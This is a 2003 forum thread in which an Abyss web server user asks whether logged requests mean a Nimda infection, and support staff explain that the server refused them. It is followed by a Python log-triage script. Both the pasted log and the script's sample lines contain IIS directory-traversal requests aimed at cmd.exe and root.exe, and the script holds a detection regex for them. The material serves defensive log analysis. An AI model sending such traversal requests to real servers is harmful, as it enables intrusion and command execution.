		| Author | Message | 
	
		| os17fan -
 
 
 Joined: 21 Mar 2003
 Posts: 531
 Location: USA
 
 | 
			
				|  Posted: Sun Apr 06, 2003 5:03 am    Post subject: Is Abyss an IIS web server, and if it is, how do I patch it? |   |  
				| 
 |  
				| My name is Josh and I'm wondering if Abyss is an IIS-type web server. I need to know this so I can patch the web server to block the Nimda virus.
 :D  :?:  :(
 _________________
 This web server is the best !
 |  | 
	
	
		| vbgunz -
 
 
 Joined: 02 Feb 2003
 Posts: 615
 Location: Florida
 
 | 
			
				|  Posted: Sun Apr 06, 2003 7:30 am    Post subject: |   |  
				| 
 |  
				| No, it isn't. It's a Windows server but far from being IIS. You shouldn't have to worry much about IIS infections when using Abyss. Good luck :)
 _________________
 Victor B. Gonzalez
 http://aeonserv.com
 |  | 
	
	
		| os17fan -
 
 
 Joined: 21 Mar 2003
 Posts: 531
 Location: USA
 
 | 
			
				|  Posted: Sun Apr 06, 2003 8:18 am    Post subject: |   |  
				| 
 |  
				| Are you sure? Because I got some weird coding in my log file the other night. Here's a sample below:
 68.32.22.142 - - [04/Apr/2003:19:42:45 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
 68.32.22.142 - - [04/Apr/2003:19:42:50 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
 68.32.22.142 - - [04/Apr/2003:19:42:57 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
 68.32.22.142 - - [04/Apr/2003:19:43:02 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
 68.32.22.142 - - [04/Apr/2003:19:43:06 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 68.32.22.142 - - [04/Apr/2003:19:43:09 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 68.32.22.142 - - [04/Apr/2003:19:43:13 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 68.32.22.142 - - [04/Apr/2003:19:43:18 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 68.32.22.142 - - [04/Apr/2003:19:43:21 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 68.32.22.142 - - [04/Apr/2003:19:43:24 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 68.32.22.142 - - [04/Apr/2003:19:43:28 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 68.32.22.142 - - [04/Apr/2003:19:43:31 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 
 Someone help, I think this is the virus Nimda trying to download to my computer  :(
 _________________
 This web server is the best !
 |  | 
	
	
		| aprelium -
 
 
 Joined: 22 Mar 2002
 Posts: 6800
 
 
 | 
			
				|  Posted: Sun Apr 06, 2003 3:16 pm    Post subject: |   |  
				| 
 |  
				| The log lines you get mean that someone tried to attack your server thinking that it's an IIS one, but the server refuses these attacks (error codes 400 and 404). So do not worry.
 _________________
 Support Team
 Aprelium - http://www.aprelium.com
 |  | 
	
	
		| os17fan -
 
 
 Joined: 21 Mar 2003
 Posts: 531
 Location: USA
 
 | 
			
				|  Posted: Sun Apr 06, 2003 6:57 pm    Post subject: |   |  
				| 
 |  
				| So at the end where it says 400, that's an error:
 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 
 So my server is completely Nimda virus free!
 _________________
 This web server is the best !
 |  | 
	
	
		| aprelium -
 
 
 Joined: 22 Mar 2002
 Posts: 6800
 
 
 | 
			
				|  Posted: Mon Apr 07, 2003 11:10 am    Post subject: |   |  
				| 
 |  
				| os17fan wrote: | So at the end where it says 400, that's an error:
 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 
 So my server is completely Nimda virus free!
 | 
 Error code 400 means that Abyss refuses to process the offending request.
 _________________
 Support Team
 Aprelium - http://www.aprelium.com
 |  | 
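A log triage along the lines of the two Aprelium replies above, as an added example (not part of the thread and not Abyss or Aprelium code): it parses Common Log Format lines, picks out requests with the traits visible in the posted sample, and separates the ones the server refused from any it answered with a 2xx/3xx status. The function name `triage`, the sample lines and their addresses are constructed for illustration.

```python
import re
from collections import defaultdict

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)$')

# Request traits seen in the thread's log sample (probes aimed at IIS).
PROBE = re.compile(
    r'(?:cmd|root)\.exe'          # Windows command shell / root.exe
    r'|%25[0-9a-f]{2}'            # double-encoded byte such as %255c
    r'|%c[01]%[0-9a-f]{2}',       # two-byte forms such as %c0%af, %c1%1c
    re.IGNORECASE)

def triage(lines):
    """Group probe requests by client: count refused ones, list served ones."""
    report = defaultdict(lambda: {"refused": 0, "served": []})
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue                      # not a CLF line
        host, _when, request, status, _size = m.groups()
        parts = request.split(" ")
        target = parts[1] if len(parts) >= 2 else request
        if not PROBE.search(target):
            continue                      # ordinary traffic
        if status[0] in "23":
            report[host]["served"].append(target)   # answered: needs a closer look
        else:
            report[host]["refused"] += 1            # 4xx/5xx: request was rejected
    return dict(report)

# Constructed sample: documentation addresses, paths shaped like those in the thread.
SAMPLE = [
    '192.0.2.10 - - [04/Apr/2003:19:42:45 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427',
    '192.0.2.10 - - [04/Apr/2003:19:43:06 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429',
    '192.0.2.10 - - [04/Apr/2003:19:43:28 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429',
    '192.0.2.20 - - [04/Apr/2003:20:01:00 +0000] "GET /index.html HTTP/1.0" 200 1024',
    '198.51.100.7 - - [04/Apr/2003:21:15:09 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for host, r in triage(SAMPLE).items():
        verdict = "INVESTIGATE" if r["served"] else "refused"
        print(f"{host}: {r['refused']} refused, {len(r['served'])} served -> {verdict}")
```

A client whose probes all land in `refused` matches the situation described in the thread; an entry in `served` means the server returned content for a probe path and the host should be checked.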
	